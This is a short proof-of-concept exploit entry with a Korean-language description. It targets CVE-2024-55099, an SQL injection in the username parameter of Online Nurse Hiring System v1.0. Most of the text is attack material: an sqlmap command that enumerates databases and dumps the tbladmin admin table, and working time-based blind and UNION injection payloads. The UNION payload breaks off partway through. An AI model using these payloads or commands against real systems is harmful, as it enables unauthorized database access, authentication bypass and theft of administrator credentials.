
온라인 간호사 채용 시스템 v1.0에서 삭제되지 않은 사용자 이름 매개변수를 통한 SQL 주입을 시연하는 CVE-2024-55099에 대한 개념 증명 익스플로잇으로, 데이터베이스 열거 및 인증 우회를 가능하게 합니다.
sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---
